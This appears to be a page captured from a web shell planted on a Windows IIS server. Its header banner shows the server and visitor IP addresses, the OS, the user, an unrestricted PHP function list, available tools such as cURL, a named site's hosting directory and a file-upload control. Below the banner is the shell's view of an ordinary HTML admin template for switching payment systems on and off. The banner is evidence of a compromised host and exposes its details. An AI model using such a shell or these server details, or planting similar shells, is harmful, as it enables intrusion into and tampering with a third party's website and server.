| Server IP : 209.209.40.120 / Your IP : 216.73.217.112 Web Server : Microsoft-IIS/10.0 System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586 User : NEWWWW$ ( 0) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/HostingSpaces/admin/chatme24.com/wwwroot/administration/default/ |
Upload File : |
{header}
<div class="block_narrow">
{menu_page}
</div>
<script>
/*$(function(){
$('.pay_satus').change(function(){
if(!$('.pay_satus:checked')[0]){
$(this).prop('checked',true);
alert('{l_must_be_selected_one_payment_system}');
}
})
})*/
</script>
<div class="block_main">
<h2>{l_title_current}</h2>
<div class="bl_form">
<form action="{url_page}" method="POST">
<input type="hidden" name="cmd" value="update">
<table class="tb_fields" style="width:300px;">
<thead>
<tr id="no_sortable" >
<th class="decor_l"> </th>
<th class="right" style="border-right: none; text-align: center;" >{l_table_name}</th>
<th class="last" style="text-align: center; width:30px;">{l_active}</th>
<th class="decor_r"> </th>
</tr>
</thead>
<!-- begin_item -->
<tr class="color" style=" cursor: default;">
<td id ="decor_l" class="decor_l"> </td>
<td class="left">
{title}
</td>
<td class="last" style="text-align: center; width:30px;">
<input class="pay_satus" type="checkbox" name="status[{key}]" {checked} style="margin:-4px 0px 0px 0px; padding:0px; width: 20px;">
</td>
<td id ="decor_r" class="decor_r"> </td>
</tr>
<!-- end_item -->
</table>
<div class="wrap_button fl_right">
<button class="button submit" type="submit">{l_save}</button>
<div class="button_submit_instruction">{l_or_use_ctrl_s}</div>
</div>
</form>
</div>
<div class="empty"></div>
</div>
{footer}